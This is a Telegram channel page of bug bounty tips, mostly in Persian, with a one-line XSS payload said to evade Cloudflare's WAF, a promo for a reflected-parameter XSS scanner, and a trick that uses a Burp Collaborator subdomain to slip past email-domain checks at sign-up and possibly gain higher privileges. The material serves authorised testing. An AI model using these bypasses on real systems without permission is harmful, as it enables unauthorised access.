Bugbounty Tips

Forwarded from sn0whacks

🔥پیلود XSS برای دور زدن CloudFlare WAF:

‘>alert(154)</script><script/154=’;;;;;;;

@sn0whacks
#bugbountyTips

👍12

1.72K views14:26

Bugbounty Tips

https://x.com/R00TDR/status/1767123886745792692?t=9Gzo4chpc2XMIP02dDxNqA

دوستان توییتر منه اگه دوست داشتید دنبال کنین🙏

👎9👍6

2.17K views06:34

Bugbounty Tips

Forwarded from Bug Bounty Tools & Writeups | Hide Club

🔖

Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities

It crawls a target website, extracts GET parameters, and tests them for reflected input. The tool helps bug bounty hunters and penetration testers quickly identify potential reflected #XSS flaws, offering fast and reliable results.

⬇️

Features

🔴Crawls a target domain to discover all pages and GET parameters.
🔴Tests each parameter to check if it's reflected in the response.
🔴Outputs a list of reflected parameters for further exploitation.
🔴Fast and optimized for bug bounty hunters.
🔴Easy to use with minimal setup.

📱

Github:

🔗

Link

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #bugbountyTools
🔹 Share & Support Us 🔹
📱 Channel : @Hide_Club

Please open Telegram to view this post

VIEW IN TELEGRAM

❤8

1.45K views14:35

Bugbounty Tips

✔️حل شد عرفان(@ScriptKiddo0o0) تونست بایپسش کنه. سر یه پروژه ایی یه اسکن با یه سرویس انلاین انجام دادم برای دسترسی به فایل ریپورت و محتویات نیازمند پرمیوم یوزر بود یا ثبت نام و وریفای حساب فقط با ایمیل خود دامنه امکان پذیر بود که بایپسش کردم تا چند ساعت دیگه…

اینجا برای اینکه امکان ثبت نام در سامانه میسر باشه باید با یکی از ایمیل های معتبری که قبلا تعریف شده ثبت نام انجام بشه مثل:
[email protected]
همونجور که میدونید Burp Collaborator امکان دریافت SMTP Connection رو هم داره.
پس ما میتونیم با قرار دادن دامین مورد نظر در سابدامین Collaborator خودمون این Validation رو بایپس کنیم:
[email protected]
به همین سادگی امکان دور زدن این مکانیزم وجود داره،
نکته ایی که مهمه اینه شما میتونید در جاهای متنوعی مخصوصا جاهایی Role های مختلف و سطح دسترسی های مختلفی داره ثبت نام رو انجام بدید ممکنه اگر با ایمیل معتبر سازمان ثبت نام کنید، به صورت پیشفرض دسترسی سطح بالاتری بهتون اختصاص داده بشه.

#bugbounty
#challange
#bugbountytips
#testcase

🔥35👍2

4.84K views23:55

About

Blog

Apps

Platform